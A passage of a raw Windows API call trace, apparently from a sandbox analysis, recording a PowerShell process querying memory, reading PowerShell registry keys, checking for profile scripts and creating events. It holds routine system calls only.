	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.207] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.208] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.208] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.208] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.208] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.208] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.208] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.221] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.221] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.223] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.223] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.253] VirtualQuery (in: lpAddress=0xcb980, lpBuffer=0xcc840, dwLength=0x30 | out: lpBuffer=0xcc840*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.259] VirtualQuery (in: lpAddress=0xcb980, lpBuffer=0xcc840, dwLength=0x30 | out: lpBuffer=0xcc840*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.259] VirtualQuery (in: lpAddress=0xcb1d0, lpBuffer=0xcc090, dwLength=0x30 | out: lpBuffer=0xcc090*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.259] VirtualQuery (in: lpAddress=0xcb1d0, lpBuffer=0xcc090, dwLength=0x30 | out: lpBuffer=0xcc090*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7d8 | out: phkResult=0xcd7d8*=0x3b4) returned 0x0
	[0114.260] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd75c, lpData=0x0, lpcbData=0xcd758*=0x0 | out: lpType=0xcd75c*=0x1, lpData=0x0, lpcbData=0xcd758*=0x56) returned 0x0
	[0114.260] CoTaskMemAlloc (cb=0x5a) returned 0x1b851850
	[0114.260] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd72c, lpData=0x1b851850, lpcbData=0xcd728*=0x56 | out: lpType=0xcd72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd728*=0x56) returned 0x0
	[0114.260] CoTaskMemFree (pv=0x1b851850) 
	[0114.260] RegCloseKey (hKey=0x3b4) returned 0x0
	[0114.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7d8 | out: phkResult=0xcd7d8*=0x3b4) returned 0x0
	[0114.261] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd75c, lpData=0x0, lpcbData=0xcd758*=0x0 | out: lpType=0xcd75c*=0x1, lpData=0x0, lpcbData=0xcd758*=0x56) returned 0x0
	[0114.261] CoTaskMemAlloc (cb=0x5a) returned 0x1b851850
	[0114.261] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd72c, lpData=0x1b851850, lpcbData=0xcd728*=0x56 | out: lpType=0xcd72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd728*=0x56) returned 0x0
	[0114.261] CoTaskMemFree (pv=0x1b851850) 
	[0114.261] RegCloseKey (hKey=0x3b4) returned 0x0
	[0114.261] CoTaskMemAlloc (cb=0x20c) returned 0x1b844d20
	[0114.261] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b844d20 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0114.261] CoTaskMemFree (pv=0x1b844d20) 
	[0114.261] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0114.261] CoTaskMemAlloc (cb=0x20c) returned 0x1b844d20
	[0114.261] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b844d20 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0114.261] CoTaskMemFree (pv=0x1b844d20) 
	[0114.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0114.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0114.262] SetErrorMode (uMode=0x1) returned 0x1
	[0114.263] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0114.263] SetErrorMode (uMode=0x1) returned 0x1
	[0114.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0114.263] SetErrorMode (uMode=0x1) returned 0x1
	[0114.263] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0114.263] SetErrorMode (uMode=0x1) returned 0x1
	[0114.263] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0114.263] SetErrorMode (uMode=0x1) returned 0x1
	[0114.263] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0114.264] SetErrorMode (uMode=0x1) returned 0x1
	[0114.264] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0114.264] SetErrorMode (uMode=0x1) returned 0x1
	[0114.264] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0114.264] SetErrorMode (uMode=0x1) returned 0x1
	[0114.265] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.265] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.265] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.265] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.266] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.266] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.267] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.267] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.268] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.268] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b4
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x358
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x38c
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b8
	[0114.269] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c
	[0114.270] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0114.270] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.270] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.272] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0114.273] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.273] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.276] SetEvent (hEvent=0x384) returned 1
	[0114.276] SetEvent (hEvent=0x3b4) returned 1
	[0114.276] SetEvent (hEvent=0x358) returned 1
	[0114.276] SetEvent (hEvent=0x380) returned 1
	[0114.276] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4
	[0114.278] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.278] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.278] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd678 | out: phkResult=0xcd678*=0x330) returned 0x0
	[0114.279] RegQueryValueExW (in: hKey=0x330, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd5fc, lpData=0x0, lpcbData=0xcd5f8*=0x0 | out: lpType=0xcd5fc*=0x0, lpData=0x0, lpcbData=0xcd5f8*=0x0) returned 0x2

Thread:
	id = 110
	os_tid = 0x948


Thread:
	id = 112
	os_tid = 0x55c


Thread:
	id = 114
	os_tid = 0x928


Thread:
	id = 115
	os_tid = 0x90


Thread:
	id = 117
	os_tid = 0x7e8


Thread:
	id = 120
	os_tid = 0x138

	[0102.176] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0111.105] LocalFree (hMem=0x197150) returned 0x0
	[0111.105] CloseHandle (hObject=0x320) returned 1
	[0111.105] CloseHandle (hObject=0x13) returned 1
	[0111.106] CloseHandle (hObject=0xf) returned 1
	[0111.106] RegCloseKey (hKey=0x30c) returned 0x0
	[0111.107] RegCloseKey (hKey=0x308) returned 0x0
	[0111.107] RegCloseKey (hKey=0x304) returned 0x0
	[0111.107] LocalFree (hMem=0x197120) returned 0x0
	[0111.107] RegCloseKey (hKey=0x330) returned 0x0
	[0112.550] RegCloseKey (hKey=0x3b0) returned 0x0
	[0112.550] RegCloseKey (hKey=0x378) returned 0x0
	[0112.550] RegCloseKey (hKey=0x374) returned 0x0
	[0112.551] RegCloseKey (hKey=0x370) returned 0x0
	[0112.551] RegCloseKey (hKey=0x36c) returned 0x0
	[0112.551] RegCloseKey (hKey=0x368) returned 0x0
	[0112.551] RegCloseKey (hKey=0x364) returned 0x0
	[0112.552] RegCloseKey (hKey=0x360) returned 0x0
	[0112.552] RegCloseKey (hKey=0x35c) returned 0x0
	[0112.552] RegCloseKey (hKey=0x3ac) returned 0x0
	[0112.552] RegCloseKey (hKey=0x34c) returned 0x0
	[0112.553] RegCloseKey (hKey=0x348) returned 0x0
	[0112.553] RegCloseKey (hKey=0x344) returned 0x0
	[0112.553] RegCloseKey (hKey=0x340) returned 0x0
	[0112.553] RegCloseKey (hKey=0x33c) returned 0x0
	[0112.554] RegCloseKey (hKey=0x338) returned 0x0
	[0112.554] RegCloseKey (hKey=0x320) returned 0x0
	[0112.554] RegCloseKey (hKey=0x30c) returned 0x0
	[0112.554] RegCloseKey (hKey=0x3a8) returned 0x0
	[0112.554] RegCloseKey (hKey=0x304) returned 0x0
	[0112.554] RegCloseKey (hKey=0x330) returned 0x0
	[0112.555] RegCloseKey (hKey=0x3a4) returned 0x0
	[0112.555] RegCloseKey (hKey=0x3a0) returned 0x0
	[0112.555] RegCloseKey (hKey=0x37c) returned 0x0
	[0112.555] RegCloseKey (hKey=0x3b8) returned 0x0
	[0112.556] RegCloseKey (hKey=0x398) returned 0x0
	[0112.556] RegCloseKey (hKey=0x394) returned 0x0
	[0112.556] RegCloseKey (hKey=0x390) returned 0x0
	[0112.556] RegCloseKey (hKey=0x38c) returned 0x0
	[0112.557] RegCloseKey (hKey=0x388) returned 0x0
	[0112.557] RegCloseKey (hKey=0x384) returned 0x0
	[0112.557] RegCloseKey (hKey=0x380) returned 0x0
	[0112.557] RegCloseKey (hKey=0x358) returned 0x0
	[0112.558] RegCloseKey (hKey=0x3b4) returned 0x0
	[0112.558] RegCloseKey (hKey=0x334) returned 0x0
	[0117.046] RegCloseKey (hKey=0x330) returned 0x0

Thread:
	id = 132
	os_tid = 0x5b0

	[0114.365] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0114.371] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0114.377] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
